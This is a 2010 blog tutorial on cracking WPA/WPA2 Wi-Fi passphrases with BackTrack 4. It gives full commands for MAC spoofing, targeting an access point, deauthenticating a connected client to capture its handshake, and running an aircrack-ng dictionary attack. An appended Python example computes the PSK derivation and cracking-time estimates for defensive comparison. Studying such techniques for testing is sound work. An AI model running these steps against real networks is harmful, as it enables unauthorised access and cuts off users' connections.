How to Crack WPA-PSK and WPA2 with BackTrack 4 Beta | Kluwan Backtrack

Sunday, 7 February 2010

How to Crack WPA-PSK and WPA2 with BackTrack 4 Beta

The mechanics of cracking WPA are simple and straightforward. The biggest drawback is that, after you capture the handshake, the passphrase must actually be in your dictionary file, and there must be a client computer connected to the AP you want to test. I am using an HP Pavilion laptop with a Ralink wireless USB adapter; I booted BackTrack 4 from CD and I am ready to begin.

First I have to stop the wireless card so I can manipulate some settings.

airmon-ng stop wlan0

(wlan0 is my wireless USB adapter). If I am unsure which devices I have, I would run

ifconfig -a

to list all available NICs.

Now bring the wireless interface down by typing

ifconfig wlan0 down

I am now ready to assign a fake MAC address to my USB device:

macchanger --mac 00:11:22:33:44:55 wlan0

I can use any MAC address as long as it is valid in length and characters; this one is simply easy to type.

Next you must identify the BSSID and channel of the AP you want to crack:

airodump-ng wlan0

This will show you every AP within range of your wireless card. The screen will look something like this:

BSSID              PWR  Beacons  #Data  #/s  CH  MB  ENC   CIPHER  AUTH  ESSID
00:1C:58:AE:C3:01  -60  124      1      0    1   54  WPA2  CCMP    PSK   Network

BSSID              Station            PWR  Rate  Lost  Packets  Probe
00:1C:58:AE:C3:01  00:1B:66:AD:C6:00  -57  0- 1  48             Network

You will need the BSSID and the channel to proceed to the next step:

airodump-ng -c 1 -w wpa1 --bssid 00:1C:58:AE:C3:01 wlan0

This command starts monitoring traffic on that specific AP and writes everything it collects to a capture file; in this example the file prefix is wpa1, so airodump-ng creates wpa1-01.cap. That capture is what aircrack-ng later uses to recover the passphrase.

Now open a new shell; we are ready to capture the handshake between a workstation and the AP.

aireplay-ng -0 10 -a 00:1C:58:AE:C3:01 -c 00:1B:66:AD:C6:00 wlan0

This command injects deauthentication packets (here 10 of them) addressed from the AP (-a, the BSSID) to the connected station (-c, the station MAC from the second airodump-ng table) and forces the workstation to reconnect, producing a new handshake. When you capture it, the airodump-ng screen will show a message across the top saying it has the handshake.

Now you are ready to crack the password. Stop both the airodump-ng and aireplay-ng shells and open a final new shell. By default BackTrack 4 ships a dictionary file you can use, though I suggest extending it with additional passwords for a more thorough attack. It is located under /pentest/wireless/cowpatty and is named dict; you can navigate to it using Konqueror or from the command line. In your new console type:

aircrack-ng -w /pentest/wireless/cowpatty/dict wpa1-01.cap

If the password is in your dict file, the crack takes only a few moments and the password is shown on screen.

Many APs now change passwords every hour, and others use long, high-entropy WPA passphrases that make cracking extremely difficult. Bottom line: if you are a company and your WPA passphrase is long and random, this makes cracking almost impossible unless a professional has hours and hours of time and a dictionary file hundreds of megabytes in size.
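The closing point, that a dictionary attack only works when the passphrase is in the dictionary, follows from how WPA-PSK turns a passphrase into the key. The following is an added example, not code from the original post or from the aircrack-ng project: it reproduces the public IEEE 802.11i derivation (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 256-bit output) and uses it to estimate how long exhausting a wordlist or a character space would take at a given guess rate. The SSID "Network" comes from the post's airodump-ng output; the rate figures and candidate passphrases are constructed values. The handshake capture and MIC verification the post describes are not implemented here.

```python
"""WPA/WPA2-PSK passphrase derivation and dictionary-attack cost estimate.

Added example, not part of the original post. Only the PBKDF2 step from
IEEE 802.11i is reproduced; the 4-way handshake and MIC check are not.
"""
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PSK_LENGTH = 32            # 256-bit pre-shared key


def wpa_psk(ssid: str, passphrase: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32), as in 802.11i."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PSK_LENGTH,
    )


def measure_rate(ssid: str = "Network", samples: int = 50) -> float:
    """Derivations per second on this machine (constructed candidates)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk(ssid, f"constructed{i:08d}")
    return samples / (time.perf_counter() - start)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidates for a random passphrase of the given shape."""
    return alphabet_size ** length


def seconds_to_exhaust(candidates: int, rate: float) -> float:
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return candidates / rate


def human_time(seconds: float) -> str:
    """Render a duration in the largest convenient unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


def report(rate: float) -> dict:
    """Cost of several passphrase policies at a fixed guess rate."""
    # Wordlist size and character spaces below are constructed scenarios.
    scenarios = {
        "1e6-word dictionary": 1_000_000,
        "8 lowercase letters": keyspace(26, 8),
        "12 mixed-case + digits": keyspace(62, 12),
        "20 mixed-case + digits": keyspace(62, 20),
    }
    return {name: seconds_to_exhaust(n, rate) for name, n in scenarios.items()}


if __name__ == "__main__":
    # The SSID is the salt: the same passphrase yields a different PSK on
    # every network, so precomputed tables only help against common SSIDs.
    print(wpa_psk("Network", "password").hex())
    print(wpa_psk("IEEE", "password").hex())
    local = measure_rate()
    print(f"this CPU: {local:,.0f} PSK/s")
    for rate in (local, 1_000_000):   # 1e6/s is a constructed GPU-class rate
        print(f"--- at {rate:,.0f} guesses/s ---")
        for name, secs in report(rate).items():
            print(f"{name:>24}: {human_time(secs)}")
```

The interesting output is the contrast between the first two rows and the last: a million-entry wordlist falls in seconds, eight lowercase letters in a few days at a million guesses per second, while twenty random alphanumerics put the worst case far beyond any practical dictionary, which is the defensive takeaway of the post.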
